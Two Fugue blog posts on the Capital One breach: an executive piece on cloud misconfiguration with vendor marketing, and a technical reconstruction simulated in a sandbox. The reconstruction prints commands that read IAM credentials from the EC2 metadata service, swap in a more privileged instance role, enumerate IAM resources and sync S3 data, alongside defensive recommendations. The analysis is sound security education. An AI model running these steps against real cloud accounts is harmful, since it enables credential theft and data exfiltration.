What Executives Should Know About the Capital One Breach

This article was originally published on Fugue's blog here.

By Phillip Merrick, CEO of Fugue

Most enterprises are already using public cloud computing services at scale or are planning to adopt the cloud soon. As an executive, chances are you’re paying attention to the Capital One data breach and wondering how this event should impact your decision-making.

This is understandable and good. Capital One has been a true trailblazer within the financial sector in adopting and innovating in the cloud at a time when most of their peers have been slower in making the transition. They’ve attracted an army of cloud experts, including some incredibly talented cloud security professionals. I know some of them personally and respect them greatly. Yet they still got breached. How? And what can we learn from this?

Before we dive in, the following truth can’t be stressed enough: The cloud itself is far more secure than any data center. However, we have to think differently about security in the cloud versus the way we have thought about security in the data center.

I’ll explain why and provide some guidance on how you can ensure your cloud and security teams are properly prioritizing and managing the risks. But first, let’s look at what happened in this case.

This data breach was the result of cloud misconfiguration

Whether or not this is the first time you have heard the term “cloud misconfiguration,” it won’t be the last. According to Neil MacDonald at Gartner, “nearly all successful attacks on cloud services are the result of customer misconfiguration, mismanagement and mistakes.”

That seems to be the case here, but it’s not as simple as leaving an Amazon Web Services (AWS) S3 bucket (an object storage service) open to public access, which unfortunately does happen with some frequency. The hacker here appears to have exploited a series of cloud misconfigurations to move laterally within the company’s cloud environment in order to extract sensitive data. Here’s an overly-simplified explanation:

  1. A misconfigured firewall allowed the hacker to access an Amazon EC2 instance (a virtual server).
  2. Once on the EC2 instance, the hacker obtained an IAM (Identity and Access Management) role which gave her access to S3 buckets containing customer data.
  3. Overly broad access to S3 from the compromised server enabled the hacker to discover and then duplicate the contents and extract them.

My colleague and Fugue CTO Josh Stella wrote up a detailed technical analysis of the breach based on the information we have, along with some technical advice. You can read it here and/or point your technical folks at it.

We’ll no doubt learn more about this breach, and possibly others by the same hacker, over time. But there are some takeaways we can learn now, and steps we can take.

1. Ask Questions About Your Cloud Security Posture

The risks due to cloud misconfiguration are real, and you need to make sure your cloud and security teams take it seriously. If you don’t already know, find out who’s responsible for the security of your cloud environments and data. It may be a security team, a DevOps team, or perhaps individual application teams. Ask them questions about your cloud security posture.

  • What are we doing to prevent cloud misconfigurations from happening in the first place? Do we have automated, policy-based guardrails in place to prevent misconfigurations and policy violations from being introduced into our cloud environments? Are we evaluating the infrastructure environment as a whole for misconfiguration vulnerabilities (and not just individual resource configurations)?
  • What are we doing to find and fix cloud misconfigurations when they do occur? Getting your cloud configurations secure on day one is good, but a lot can go wrong on day two. Change in the cloud is constant: new applications are being developed, existing applications are being enhanced, and technical staff make changes to cloud configurations to investigate and resolve production problems. We call all these changes “drift” and any one drift event can introduce or reintroduce a cloud misconfiguration. Is your team continuously identifying drift, misconfigurations, and policy violations? Are they using automated remediation for security-critical cloud resources to reduce the risk of human error and lengthy response times?
  • Do we have continuous visibility into the configuration state of our cloud environments? One big advantage the cloud has over the data center is that in the cloud, every configuration detail is knowable via application programming interfaces (APIs). If your team is manually auditing cloud configurations, that’s a problem that should be addressed with automation.

2. Cloud security is different. So think differently.

The cloud is fundamentally different than the data center, and that means cloud security is fundamentally different than data center security. Many of the security tools and processes that worked in the data center simply aren’t effective or don’t scale well in the cloud.

There are many ways cloud is different than the data center. First and foremost, everything is software defined and programmable via APIs. This means not only can your application deployments be fully automated, so can your cloud security. The bad guys are using automation, and you need to use automated defenses to keep up. Make sure your penetration testers, who should be outside vendors, are looking for cloud misconfigurations as part of their efforts. Our experience is that traditional penetration testers don’t always do this.

Traditional approaches to things like network security don’t apply as much in the cloud — for one thing, you aren’t typically monitoring network traffic directly, though new features such as AWS VPC Traffic Mirroring or Azure Virtual Network TAP may help eventually. Instead the paradigm of IAM has become paramount. You can think of identity as the new network or the new firewall. You will want to put a lot of focus on this and make sure your teams aren’t using overly permissive IAM roles. The principle of least permissions to accomplish a desired task is key here.

Because the cloud is programmable, your developers are moving fast and making cloud infrastructure decisions, including those with security ramifications. Empower them to move fast and securely with tools to automate cloud security and compliance.

I wrote recently on the five things executives need to know about cloud security. You canread it here.

3. There will be FUD. Ignore it.

Right now legacy technology vendors are using this event in order to sell fear, uncertainty, and doubt (FUD)—so they can keep selling their products. And many organizations inevitably have people on staff who are resistant to change—who will use events like this to try to slow down or stop cloud adoption.

Make no mistake—the cloud is highly secure, so don’t let anyone convince you otherwise. Cloud providers like AWS and Microsoft Azure have incredibly impressive security track records. There have been no data breaches due to a security failure by any of the major cloud providers like AWS or Azure. None.

The FUD peddlers either don’t understand the cloud or they don’t like change. And sometimes they may not have your best interests at heart.

If you avoid the cloud or slow your adoption, you’re not making your IT infrastructure, applications, and data more secure. You’re simply ensuring that you’ll be slower, less agile, less efficient, and less competitive. And in all likelihood, less secure.

Read more industry insights from the team at Fugue here.

About the author

Phillip Merrick is the CEO of Fugue, a leading provider of cloud security and compliance software. Prior to joining Fugue he built Sparkpost into a leading cloud email delivery provider, going from zero to eight figures of ARR in three years. Before Sparkpost he led webMethods, Inc., a leading vendor of business integration software, which he co-founded in 1996. Under his leadership, webMethods pioneered web APIs, web services (for which Phillip co-holds the original patents) and Internet-based software integration technologies.


A Technical Analysis of the Capital One Cloud Misconfiguration Breach

This article was originally published on Fugue's blog here. 

By Josh Stella, Co-founder & Chief Technology Officer, Fugue

This is a technical exploration of how the Capital One breach might have occurred, based on the evidence we have from the criminal complaint. I want to start by saying that I deeply respect the Capital One cloud team, and have friends on it. They’ve been leaders in cloud computing, and what happened to them could have happened to nearly anyone. I’m also not criticizing Amazon Web Services (AWS)⁠—my previous employer. They offer secure services and I have nothing but respect for them. The purpose of this post is to explore a combination firewall/IAM/S3 attack to illustrate some of the dangers of cloud misconfigurations that every organization on cloud should heed.

In order to write this, I analyzed the technical details of the FBI complaint, and then formed a hypothesis of how the attack might have taken place. I then simulated the attack in my development account, so that I could provide specific details in this post.

The facts as we know them

We have a smattering of information on the attack from the FBI complaint, and from social media posts by the alleged attacker. It appears that the attacker used Tor and IPredator in combination to obfuscate her identity, and through those services, discovered a misconfigured firewall in the Capital One AWS environment. What isn’t clear is whether this was a targeted attack on Capital One, or an opportunistic attack upon finding the misconfiguration.

Many articles have been written on the possible motivations and biography of the attacker, so I’ll leave those aside to focus on the technical specifics. There were four different elements to the attack that we know about:

  • Misconfigured firewall
  • Gaining access to an EC2 instance
  • Getting IAM role access to S3
  • S3 bucket discovery and duplication.

Each of the above are explored in some detail below.

How the hack could have happened

We have some details, but really not that many, and therefore I employed a fair amount of speculation and interpretation of the facts that we do have. I’ll clearly state when I’m speculating as we walk through the steps of the attack below. The diagram below shows my sandbox environment where I simulated some aspects of the Capital One breach.

The environment contains:

  1. a basic VPC network
  2. a Security Group that allows HTTP(S) and SSH
  3. a private S3 Bucket
  4. two IAM Roles – one with S3 access, and one without
  5. An EC2 Instance with a public IP address, with the IAM Role that doesn’t have S3 access

My goal was to go from shell access of the EC2 instance, to the ability to access and copy the S3 data in the private buckets.

Before we go into detail on the various steps, it’s worth pointing out that the FBI gained access via a tip to a GitHub hosted file that contained the IP address of a server, along with three commands:

“Capital One determined that the April 21 File contained code for three commands, as well as a list of more than 700 folders or buckets of data.” We’ll go into some detail on each of these commands, and what they might have been and the possible strategy used by the attacker.

Step one: misconfigured firewall

According to the FBI Complaint, “A firewall misconfiguration permitted commands to reach and be executed by that server, which enabled access to folders or buckets… (III.A.10)”

This suggests that the firewall was external to the server vs. a local firewall, though it isn’t explicit. While there are many firewall virtual appliances available on AWS, generally this would be a Security Group. It seems that a dangerous port was left open on whichever firewall type was in use, and this might have been the initial opening for the attack. It’s possible that an SSH port was opened for a maintenance window, or perhaps the server in question was left over from development efforts and no longer in use. Another possibility is that the server was running an application such as MongoDB or ElasticSearch that require an open port to function, but which should never have been exposed to the Internet via the firewall. Whatever the details, the attacker found a path into the CapitalOne cloud computing infrastructure.

Step two: gaining access to an EC2 instance

Based on the FBI complaint’s description of the compromised entity as a “server” and that the attacker was able to extract IAM credentials from it, it appears that an EC2 Instance was then breached. This might have been an application or OS vulnerability⁠—we simply don’t know. For the purposes of my simulation of the attack, I assumed the attacker gained shell access, but not root access to the instance, as all the remaining steps only require basic shell access to successfully complete.

Step three: getting IAM role access to S3

…”CapitalOne determined that the first command, when executed, obtained the security credentials for an account known as ***-WAF-Role that, in turn, enabled access to certain of Capital One’s folders at Cloud Computing Company. (III.A.11)”

Much of the “action” in this breach was via IAM role access to private S3 buckets, seemingly via AWS CLI commands from the compromised server. Much has been made of the name of the role in the press to date, but there is no solid evidence that this server was itself a WAF. It is common to “borrow” IAM roles in dynamic AWS environments (it’s not a great practice, but it is a common one), and also as will be shown below, policy associations can be changed and often have “Role” in the name, as shown in the example below. Perhaps this server was just something left around without tags to bring it up on management tooling dashboards. I’ve rarely seen a sizable AWS account without orphaned resources laying around one place or another.

If the server was itself a WAF, and intentionally had read/write access to buckets and objects in those buckets containing PII data, that was a naive defense strategy for the obvious reasons⁠—notably that a single firewall misconfiguration would be able to breach all architectural defenses to the sensitive data. This isn’t the only explanation for the breach however, and I suspect that there was more to it, using IAM and EC2 features designed for flexibility, but potentially misused to grant additional privileges.

Given that they are describing the “first command”, I think it’s reasonable to assume that they are referring to an AWS CLI script. If the EC2 instance already had access to S3, the attacker would have only needed to execute something like:

> curl http://169.254.169.254/latest/meta-data/iam/security-credentials/DemonstrationEC2Role

This command retrieves the current IAM temporary credentials from the role from the EC2 instance metadata. The output looks like this:

Where the access key and secret access key are replaced with *’s and the token corrupted to protect the innocent.

This is all that would be needed to access the S3 buckets and their content.

But there is another possibility as to what that “first command” did, and everyone who uses AWS needs to be aware of it. If the compromised server did not have access to the private S3 buckets, but did have permissions to list and attach IAM policies, the attacker could have used these capabilities to essentially go shopping for a set of credentials that would provide this access. Since IAM permissions often have no relationship to IP-level network access controls, and the AWS services connect via IAM, these roles and policies form a sort of alternate network that needs to be secured just as a traditional network does. IAM becomes a primary means of “lateral movement” within the cloud environment.

The command below, for example, replaces one set of IAM permissions with another:

> aws ec2 replace-iam-instance-profile-association –association-id iip-assoc-00facaf2870f3bcc9 –iam-instance-profile Name=DemonstrationEC2Role

which returns the following, showing that I’ve successfully replaced the existing IAM permissions for the ones in the DemonstrationEC2Role policy:

Other useful commands for such a fishing expedition include:

> aws iam list-roles

> aws iam list-policies

> aws iam list-instance-profiles

These do what it says on the tin⁠—enumerate the catalogue of available IAM resources an attacker might want to use once they have shell on an EC2 instance.

In this example, I replaced a limited IAM profile with one with additional permissions to S3. We cannot discount that the attacker executed a similar approach in the Capital One breach. Whether or not this was the case, it’s a critical capability to keep in mind when you configure IAM roles for your EC2 instances⁠—especially public facing ones—as IAM permissions can effectively “jump” to private resources in your environment.

In either scenario, the attacker gained access to the credentials needed to retrieve information from S3 and to duplicate that information.

Step four: S3 bucket discovery and duplication

“Capital One determined that the third command (the “Sync Command”), when executed, used the ***-WAF-Role to extract or copy data from those folders or buckets in Capital One’s storage space for which the ***-WAF-Role account had the requisite permissions. (III.A.11)”

This suggests the use of the AWS CLI command `aws s3 sync`, so I think it’s more evidence that the attacker gained shell access to the EC2 instance and used the AWS CLI to perform these commands. What isn’t clear is how the attacker knew which S3 buckets to perform the sync on, but if the IAM role used had adequate permissions, it’s pretty simple to list all the buckets accessible via that role. This highlights the danger of a single IAM role having this broad of S3 permissions, as even at this point, without the ability to discover the target buckets, the attacker would not have likely been able to capture much if any data.

Recommendations

  1. Constantly monitor for overly permissive Security Groups or any other access mechanism from 0.0.0.0/0. Checking on provisioning is necessary, but not nearly good enough. Cloud infrastructure is created and modified via API, which means that it is often drifting over time as different teams and people interact with it.
  2. Apply the principle of least privilege and ruthlessly limit IAM roles to what is absolutely necessary for the business function of the resource using that role. In the case of S3, you might consider different public end points for read and write operations, with different IAM roles that cannot perform the other function. Eliminate all production use cases where S3 bucket listing is enabled, in favor of shared secrets or other mechanisms.
  3. Don’t allow EC2 instances to have IAM roles that allow attaching or replacing role policies in any production environments.
  4. Ruthlessly clean up unused cloud resources (especially servers and S3 buckets) left over from prior development or production debugging efforts.
  5. Include cloud infrastructure misconfiguration in your pen testing efforts. Use outside pen testers and make sure they are knowledgeable about how to find and exploit cloud misconfigurations.

Read more industry insights from the team at Fugue here.